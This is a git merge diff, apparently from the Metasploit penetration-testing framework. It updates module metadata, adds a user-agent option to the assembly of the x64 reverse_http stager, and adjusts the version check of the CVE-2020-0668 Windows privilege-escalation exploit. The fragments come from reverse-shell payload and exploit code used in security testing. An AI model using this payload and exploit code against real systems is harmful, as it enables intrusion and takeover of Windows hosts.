Merge remote-tracking branch 'upstream/master'

db/modules_metadata_base.json

@@ -177848,7 +177848,7 @@
     "targets": [
       "Windows x64"
     ],
-    "mod_time": "2023-05-25 12:45:30 +0000",
+    "mod_time": "2024-12-12 17:11:53 +0000",
     "path": "/modules/exploits/windows/local/cve_2020_0668_service_tracing.rb",
     "is_install_path": true,
     "ref_name": "windows/local/cve_2020_0668_service_tracing",
@@ -253471,7 +253471,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2024-12-16 12:48:57 +0000",
     "path": "/modules/payloads/stagers/windows/x64/reverse_http.rb",
     "is_install_path": true,
     "ref_name": "windows/x64/custom/reverse_http",
@@ -253512,7 +253512,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2024-12-16 12:48:57 +0000",
     "path": "/modules/payloads/stagers/windows/x64/reverse_https.rb",
     "is_install_path": true,
     "ref_name": "windows/x64/custom/reverse_https",
@@ -254229,7 +254229,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2024-12-16 12:48:57 +0000",
     "path": "/modules/payloads/stagers/windows/x64/reverse_http.rb",
     "is_install_path": true,
     "ref_name": "windows/x64/meterpreter/reverse_http",
@@ -254273,7 +254273,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2024-12-16 12:48:57 +0000",
     "path": "/modules/payloads/stagers/windows/x64/reverse_https.rb",
     "is_install_path": true,
     "ref_name": "windows/x64/meterpreter/reverse_https",
@@ -256015,7 +256015,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2024-12-16 12:48:57 +0000",
     "path": "/modules/payloads/stagers/windows/x64/reverse_http.rb",
     "is_install_path": true,
     "ref_name": "windows/x64/vncinject/reverse_http",
@@ -256057,7 +256057,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2024-12-16 12:48:57 +0000",
     "path": "/modules/payloads/stagers/windows/x64/reverse_https.rb",
     "is_install_path": true,
     "ref_name": "windows/x64/vncinject/reverse_https",

lib/msf/core/payload/windows/x64/reverse_http_x64.rb

@@ -62,7 +62,7 @@ def generate(opts={})
       # Otherwise default to small URIs
       conf[:url]        = luri + generate_small_uri
     end
-
+  
     generate_reverse_http(conf)
   end
 
@@ -168,6 +168,7 @@ def asm_generate_ascii_array(str)
   # @option opts [String] :url The URI to request during staging
   # @option opts [String] :host The host to connect to
   # @option opts [Integer] :port The port to connect to
+  # @option opts [String] :ua The User Agent the payload will use
   # @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh
   # @option opts [String] :proxy_host The optional proxy server host to use
   # @option opts [Integer] :proxy_port The optional proxy server port to use
@@ -245,9 +246,21 @@ def asm_reverse_http(opts={})
       internetopen:
         push rbx                      ; stack alignment
         push rbx                      ; NULL pointer
-        mov rcx, rsp                  ; lpszAgent ("")
     ^
 
+    if opts[:ua]
+      asm << %Q^
+        call load_useragent
+        db"#{opts[:ua]}", 0x00
+      load_useragent:
+        pop rcx                         ; lpszAgent (stack pointer)
+      ^
+    else
+      asm << %Q^
+        mov rcx, rsp                    ; lpszAgent("")
+      ^
+    end
+
     if proxy_enabled
       asm << %Q^
         push 3

lib/msf/core/rpc/v10/service.rb

@@ -140,11 +140,16 @@ def process(req)
         end
       end
 
-      ::Timeout.timeout(self.dispatcher_timeout) { self.handlers[group].send(mname, *msg) }
+      ::Timeout.timeout(self.dispatcher_timeout) do
+        Thread.current[:rpc_token] = token
+        self.handlers[group].send(mname, *msg)
+      end
 
     rescue ::Exception => e
       elog('RPC Exception', error: e)
       process_exception(e)
+    ensure
+      Thread.current[:rpc_token] = nil
     end
   end
 

modules/exploits/windows/local/cve_2020_0668_service_tracing.rb

@@ -261,7 +261,6 @@ def exploit
 
     # start file copy
     rastapi_privileged_filecopy(payload_dll, exploit_dir, upload_payload_pathname, target_payload_pathname)
-
     # launch trigger
     launch_dll_trigger
     print_warning("Manual cleanup after reboot required for #{target_payload_pathname} and #{exploit_dir}")
@@ -285,8 +284,7 @@ def validate_target
     end
 
     version_info = get_version_info
-    vprint_status("Version: #{version_info.number}")
-    unless version_info.build_version.between?(Msf::WindowsVersion::Win10_1803, Msf::WindowsVersion::Win10_1909)
+    unless version_info.build_number.between?(Msf::WindowsVersion::Win10_1803, Msf::WindowsVersion::Win10_1909)
       fail_with(Failure::NotVulnerable, 'The exploit only supports Windows 10 build versions 17134-18363')
     end
   end

modules/payloads/stagers/windows/x64/reverse_http.rb

@@ -5,7 +5,7 @@
 
 module MetasploitModule
 
-  CachedSize = 528
+  CachedSize = 610
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows

modules/payloads/stagers/windows/x64/reverse_https.rb

@@ -5,7 +5,7 @@
 
 module MetasploitModule
 
-  CachedSize = 562
+  CachedSize = 644
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows